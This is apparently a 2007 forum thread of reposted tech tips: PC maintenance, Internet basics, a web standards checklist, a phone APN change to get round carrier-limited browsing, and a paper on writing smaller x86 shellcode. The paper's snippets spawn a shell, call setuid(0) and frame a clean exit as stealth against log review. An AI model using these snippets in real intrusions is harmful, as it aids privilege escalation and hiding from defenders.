7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.


Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Master
28-04-07, 23:39
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.


--------------------------------------------------------------------------------

COMPONENTS OF THE INTERNET

--------------------------------------------------------------------------------

WORLD WIDE WEB
The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or Only the registered members can see the link These protocols will be explained later in this document.

The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.

The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.

Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.

The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.

The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.

For more complete information about the World Wide Web, see Understanding The World Wide Web.

E-MAIL
Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.

A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.

TELNET
Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers (140.147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.

Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.

With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.

FTP
FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.

If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.

FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /Only the registered members can see the link This option is easiest because you do not need to know FTP program commands.

E-MAIL DISCUSSION GROUPS
One of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.

A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e-mail account to participate in a listserv discussion group. Visit Tile.net at /Only the registered members can see the link to see an example of a site that offers a searchablecollection of e-mail discussion groups.

Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.

USENET NEWS
Usenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e-mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.

Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.

There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer-related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.

The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.

FAQ, RFC, FYI
FAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at /Only the registered members can see the link

RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet. They contain both technical specifications and general information.

FYI stands for For Your Information. These notes are a subset of RFCs and contain information of interest to new Internet users.

Links to indexes of all three of these information resources are available on the University Libraries Web site at /Only the registered members can see the link

CHAT & INSTANT MESSENGING
Chat programs allow users on the Internet to communicate with each other by typing in real time. They are sometimes included as a feature of a Web site, where users can log into the "chat room" to exchange comments and information about the topics addressed on the site. Chat may take other, more wide-ranging forms. For example, America Online is well known for sponsoring a number of topical chat rooms.

Internet Relay Chat (IRC) is a service through which participants can communicate to each other on hundreds of channels. These channels are usually based on specific topics. While many topics are frivolous, substantive conversations are also taking place. To access IRC, you must use an IRC software program.

A variation of chat is the phenomenon of instant messenging. With instant messenging, a user on the Web can contact another user currently logged in and type a conversation. Most famous is America Online's Instant Messenger. ICQ, MSN and Yahoo are other commonly-used chat programs.

Other types of real-time communication are addressed in the tutorial Understanding the World Wide Web.

MUD/MUSH/MOO/MUCK/DUM/MUSE
MUD stands for Multi User Dimension. MUDs, and their variations listed above, are multi-user virtual reality games based on simulated worlds. Traditionally text based, graphical MUDs now exist. There are MUDs of all kinds on the Internet, and many can be joined free of charge. For more information, read one of the FAQs devoted to MUDs available at the FAQ site at

Master
28-04-07, 23:41
You may find this helpful if you donwload hundreds of short episodes in rm format like me and tired of double-click to open next files.

Very easy. Use notepad to open a new file, type this inside:
file://link to file1
file://link to file2
(type as many as you want)
Close file. Rename it to FileName.rm

Then you`re done!!!!

Ex:
I put my playlist file here: C:\Movies\7VNR
And the movie files are in C:\Movies\7VNR\DragonBall

Then inside my playlist file I`ll have something like this:

file://DragonBall/db134.rm
file://DragonBall/db135.rm
file://DragonBall/db136.rm
file://DragonBall/db137.rm
file://DragonBall/db138.rm

Master
28-04-07, 23:44
A Web Standards Checklist, How to make a proper website

A web standards checklist

The term web standards can mean different things to different people. For some, it is 'table-free sites', for others it is 'using valid code'. However, web standards are much broader than that. A site built to web standards should adhere to standards (HTML, XHTML, XML, CSS, XSLT, DOM, MathML, SVG etc) and pursue best practices (valid code, accessible code, semantically correct code, user-friendly URLs etc).

In other words, a site built to web standards should ideally be lean, clean, CSS-based, accessible, usable and search engine friendly.

About the checklist

This is not an uber-checklist. There are probably many items that could be added. More importantly, it should not be seen as a list of items that must be addressed on every site that you develop. It is simply a guide that can be used:

* to show the breadth of web standards
* as a handy tool for developers during the production phase of websites
* as an aid for developers who are interested in moving towards web standards

The checklist

1.Quality of code
1. Does the site use a correct Doctype?
2. Does the site use a Character set?
3. Does the site use Valid (X)HTML?
4. Does the site use Valid CSS?
5. Does the site use any CSS hacks?
6. Does the site use unnecessary classes or ids?
7. Is the code well structured?
8. Does the site have any broken links?
9. How does the site perform in terms of speed/page size?
10. Does the site have JavaScript errors?

2. Degree of separation between content and presentation
1. Does the site use CSS for all presentation aspects (fonts, colour, padding, borders etc)?
2. Are all decorative images in the CSS, or do they appear in the (X)HTML?

3. Accessibility for users
1. Are "alt" attributes used for all descriptive images?
2. Does the site use relative units rather than absolute units for text size?
3. Do any aspects of the layout break if font size is increased?
4. Does the site use visible skip menus?
5. Does the site use accessible forms?
6. Does the site use accessible tables?
7. Is there sufficient colour brightness/contrasts?
8. Is colour alone used for critical information?
9. Is there delayed responsiveness for dropdown menus (for users with reduced motor skills)?
10. Are all links descriptive (for blind users)?

4. Accessibility for devices
1. Does the site work acceptably across modern and older browsers?
2. Is the content accessible with CSS switched off or not supported?
3. Is the content accessible with images switched off or not supported?
4. Does the site work in text browsers such as Lynx?
5. Does the site work well when printed?
6. Does the site work well in Hand Held devices?
7. Does the site include detailed metadata?
8. Does the site work well in a range of browser window sizes?

5. Basic Usability
1. Is there a clear visual hierarchy?
2. Are heading levels easy to distinguish?
3. Does the site have easy to understand navigation?
4. Does the site use consistent navigation?
5. Are links underlined?
6. Does the site use consistent and appropriate language?
7. Do you have a sitemap page and contact page? Are they easy to find?
8. For large sites, is there a search tool?
9. Is there a link to the home page on every page in the site?
10. Are visited links clearly defined with a unique colour?

6. Site management
1. Does the site have a meaningful and helpful 404 error page that works from any depth in the site?
2. Does the site use friendly URLs?
3. Do your URLs work without "www"?
4. Does the site have a favicon?

1. Quality of code

1.1 Does the site use a correct Doctype?
A doctype (short for 'document type declaration') informs the validator which version of (X)HTML you're using, and must appear at the very top of every web page. Doctypes are a key component of compliant web pages: your markup and CSS won't validate without them.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


1.2 Does the site use a Character set?
If a user agent (eg. a browser) is unable to detect the character encoding used in a Web document, the user may be presented with unreadable text. This information is particularly important for those maintaining and extending a multilingual site, but declaring the character encoding of the document is important for anyone producing XHTML/HTML or CSS.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link


1.3 Does the site use Valid (X)HTML?
Valid code will render faster than code with errors. Valid code will render better than invalid code. Browsers are becoming more standards compliant, and it is becoming increasingly necessary to write valid and standards compliant HTML.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link


1.4 Does the site use Valid CSS?
You need to make sure that there aren't any errors in either your HTML or your CSS, since mistakes in either place can result in botched document appearance.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link


1.5 Does the site use any CSS hacks?
Basically, hacks come down to personal choice, the amount of knowledge you have of workarounds, the specific design you are trying to achieve.
CODE
Only the registered members can see the link@webstandardsgroup.org/msg05823.html


More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


1.6 Does the site use unnecessary classes or ids?
I've noticed that developers learning new skills often end up with good CSS but poor XHTML. Specifically, the HTML code tends to be full of unnecessary divs and ids. This results in fairly meaningless HTML and bloated style sheets.
CODE
Only the registered members can see the link


1.7 Is the code well structured?
Semantically correct markup uses html elements for their given purpose. Well structured HTML has semantic meaning for a wide range of user agents (browsers without style sheets, text browsers, PDAs, search engines etc.)
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link


1.8 Does the site have any broken links?
Broken links can frustrate users and potentially drive customers away. Broken links can also keep search engines from properly indexing your site.

More:
CODE
Only the registered members can see the link


1.9 How does the site perform in terms of speed/page size?
Don't make me wait... That's the message users give us in survey after survey. Even broadband users can suffer the slow-loading blues.
CODE
Only the registered members can see the link


1.10 Does the site have JavaScript errors?
Internet Explore for Windows allows you to turn on a debugger that will pop up a new window and let you know there are javascript errors on your site. This is available under 'Internet Options' on the Advanced tab. Uncheck 'Disable script debugging'.

2. Degree of separation between content and presentation

2.1 Does the site use CSS for all presentation aspects (fonts, colour, padding, borders etc)?
Use style sheets to control layout and presentation.
CODE
Only the registered members can see the link-style-sheets


2.2 Are all decorative images in the CSS, or do they appear in the (X)HTML?
The aim for web developers is to remove all presentation from the html code, leaving it clean and semantically correct.
CODE
Only the registered members can see the link


3. Accessibility for users

3.1 Are "alt" attributes used for all descriptive images?
Provide a text equivalent for every non-text element
CODE
Only the registered members can see the link-text-equivalent


3.2 Does the site use relative units rather than absolute units for text size?
Use relative rather than absolute units in markup language attribute values and style sheet property values'.
CODE
Only the registered members can see the link-relative-units


More:
CODE
Only the registered members can see the link-relative-units

CODE
Only the registered members can see the link


3.3 Do any aspects of the layout break if font size is increased?
Try this simple test. Look at your website in a browser that supports easy incrementation of font size. Now increase your browser's font size. And again. And again... Look at your site. Does the page layout still hold together? It is dangerous for developers to assume that everyone browses using default font sizes.
3.4 Does the site use visible skip menus?

A method shall be provided that permits users to skip repetitive navigation links.
CODE
Only the registered members can see the link


Group related links, identify the group (for user agents), and, until user agents do so, provide a way to bypass the group.
CODE
Only the registered members can see the link-group-links


...blind visitors are not the only ones inconvenienced by too many links in a navigation area. Recall that a mobility-impaired person with poor adaptive technology might be stuck tabbing through that morass.
CODE
Only the registered members can see the link-2020


More:
CODE
Only the registered members can see the link


3.5 Does the site use accessible forms?
Forms aren't the easiest of things to use for people with disabilities. Navigating around a page with written content is one thing, hopping between form fields and inputting information is another.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


3.6 Does the site use accessible tables?
For data tables, identify row and column headers... For data tables that have two or more logical levels of row or column headers, use markup to associate data cells and header cells.
CODE
Only the registered members can see the link-table-headers


More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


3.7 Is there sufficient colour brightness/contrasts?
Ensure that foreground and background colour combinations provide sufficient contrast when viewed by someone having colour deficits.
CODE
Only the registered members can see the link-colour-contrast


More:
CODE
Only the registered members can see the link


3.8 Is colour alone used for critical information?
Ensure that all information conveyed with colour is also available without colour, for example from context or markup.
CODE
Only the registered members can see the link-colour-convey


There are basically three types of colour deficiency; Deuteranope (a form of red/green colour deficit), Protanope (another form of red/green colour deficit) and Tritanope (a blue/yellow deficit- very rare).

More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


3.9 Is there delayed responsiveness for dropdown menus?
Users with reduced motor skills may find dropdown menus hard to use if responsiveness is set too fast.

3.10 Are all links descriptive?
Link text should be meaningful enough to make sense when read out of context - either on its own or as part of a sequence of links. Link text should also be terse.
CODE
Only the registered members can see the link-meaningful-links


4. Accessibility for devices.

4.1 Does the site work acceptably across modern and older browsers?

Before starting to build a CSS-based layout, you should decide which browsers to support and to what level you intend to support them.
CODE
Only the registered members can see the link



4.2 Is the content accessible with CSS switched off or not supported?
Some people may visit your site with either a browser that does not support CSS or a browser with CSS switched off. In content is structured well, this will not be an issue.

4.3 Is the content accessible with images switched off or not supported?
Some people browse websites with images switched off - especially people on very slow connections. Content should still be accessible for these people.

4.4 Does the site work in text browsers such as Lynx?
This is like a combination of images and CSS switched off. A text-based browser will rely on well structured content to provide meaning.

More:
CODE
Only the registered members can see the link


4.5 Does the site work well when printed?
You can take any (X)HTML document and simply style it for print, without having to touch the markup.
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link


4.6 Does the site work well in Hand Held devices?
This is a hard one to deal with until hand held devices consistently support their correct media type. However, some layouts work better in current hand-held devices. The importance of supporting hand held devices will depend on target audiences.

4.7 Does the site include detailed metadata?
Metadata is machine understandable information for the web
CODE
Only the registered members can see the link


Metadata is structured information that is created specifically to describe another resource. In other words, metadata is 'data about data'.


4.8 Does the site work well in a range of browser window sizes?
It is a common assumption amongst developers that average screen sizes are increasing. Some developers assume that the average screen size is now 1024px wide. But what about users with smaller screens and users with hand held devices? Are they part of your target audience and are they being disadvantaged?

5. Basic Usability
5.1 Is there a clear visual hierarchy?
Organise and prioritise the contents of a page by using size, prominence and content relationships.
CODE
Only the registered members can see the link


5.2 Are heading levels easy to distinguish?
Use header elements to convey document structure and use them according to specification.
CODE
Only the registered members can see the link-logical-headings


5.3 Is the site's navigation easy to understand?
Your navigation system should give your visitor a clue as to what page of the site they are currently on and where they can go next.
CODE
Only the registered members can see the link


5.4 Is the site's navigation consistent?
If each page on your site has a consistent style of presentation, visitors will find it easier to navigate between pages and find information
CODE
Only the registered members can see the link


5.5 Does the site use consistent and appropriate language?
The use of clear and simple language promotes effective communication. Trying to come across as articulate can be as difficult to read as poorly written grammar, especially if the language used isn't the visitor's primary language.
CODE
Only the registered members can see the link


5.6 Does the site have a sitemap page and contact page? Are they easy to find?
Most site maps fail to convey multiple levels of the site's information architecture. In usability tests, users often overlook site maps or can't find them. Complexity is also a problem: a map should be a map, not a navigational challenge of its own.
CODE
Only the registered members can see the link


5.7 For large sites, is there a search tool?
While search tools are not needed on smaller sites, and some people will not ever use them, site-specific search tools allow users a choice of navigation options.

5.8 Is there a link to the home page on every page in the site?
Some users like to go back to a site's home page after navigating to content within a site. The home page becomes a base camp for these users, allowing them to regroup before exploring new content.

5.9 Are links underlined?
To maximise the perceived affordance of clickability, colour and underline the link text. Users shouldn't have to guess or scrub the page to find out where they can click.
CODE
Only the registered members can see the link


5.10 Are visited links clearly defined?
Most important, knowing which pages they've already visited frees users from unintentionally revisiting the same pages over and over again.
CODE
Only the registered members can see the link


6. Site management

6.1 Does the site have a meaningful and helpful 404 error page that works from any depth in the site?
You've requested a page - either by typing a URL directly into the address bar or clicking on an out-of-date link and you've found yourself in the middle of cyberspace nowhere. A user-friendly website will give you a helping hand while many others will simply do nothing, relying on the browser's built-in ability to explain what the problem is.
CODE
Only the registered members can see the link


6.2 Does the site use friendly URLs?
Most search engines (with a few exceptions - namely Google) will not index any pages that have a question mark or other character (like an ampersand or equals sign) in the URL... what good is a site if no one can find it?
CODE
Only the registered members can see the link


One of the worst elements of the web from a user interface standpoint is the URL. However, if they're short, logical, and self-correcting, URLs can be acceptably usable
CODE
Only the registered members can see the link


More:
CODE
Only the registered members can see the link

CODE
Only the registered members can see the link

CODE
Only the registered members can see the link


6.3 Does the site's URL work without "www"?
While this is not critical, and in some cases is not even possible, it is always good to give people the choice of both options. If a user types your domain name without the www and gets no site, this could disadvantage both the user and you.
6.4 Does the site have a favicon?

A Favicon is a multi-resolution image included on nearly all professionally developed sites. The Favicon allows the webmaster to further promote their site, and to create a more customized appearance within a visitor's browser.
CODE
Only the registered members can see the link


Favicons are definitely not critical. However, if they are not present, they can cause 404 errors in your logs (site statistics). Browsers like IE will request them from the server when a site is bookmarked. If a favicon isn't available, a 404 error may be generated. Therefore, having a favicon could cut down on favicon specific 404 errors. The same is true of a 'robots.txt' file.

Master
28-04-07, 23:45
If you have a phone thats with the provider 3 theres a simple trick to allow you to access the entire internet on its browser without having to go through 3 services and only what they want to allow you access to view.

Simply do the following.

Menu - 9 (for settings) - 5 (for access points) - Edit the 3 Services
Change the APN (down the bottom) from 3services to 3netaccess
Restart the phone
And you can now access the entire internet through your phones browser.

Remember you'll have to change it back if you want to access 3 services.
Changing it in the browser doesn't seem to work.

I have tried this on my U8110 and it worked perfectly

Things to note:

* Remember that you are charged for all downloads (.4c per kb on most plans) so if your cautious about your phone bill id advise staying away from sites with loads of pictures.
* Also, some people have had trouble where they have accessed a site with too much information on it and the phone has either froze or reset. The phone is not harmed by this but its advisable you dont go to large sites on it for this or the above reason. If your phone freezes and you cant turn it off simply take the battery out and put it back in.

Master
28-04-07, 23:49
***********************************************
* *
* Advanced Shellcoding Techniques - by Darawk *
* Preparation by Master *
***********************************************

Introduction

This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.



The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax
mul $0x0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.


The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:


xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0x3268732f
pushl $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1
int $0x80

divl %eax # -1 / -1 = 1
int $0x80

Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero. Some people say that exit's are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.



Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0x10(%ecx),%eax

This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into it's desitination operand. In it's normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0'd and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this, to accomplish the same thing:

xorl %eax,%eax
movb $0x10,%eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you're quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying but that's only one byte it doesn't make that much of a difference, and you're right, here it doesn't make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.



Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.

Master
28-04-07, 23:50
Setting Up A Ftp:


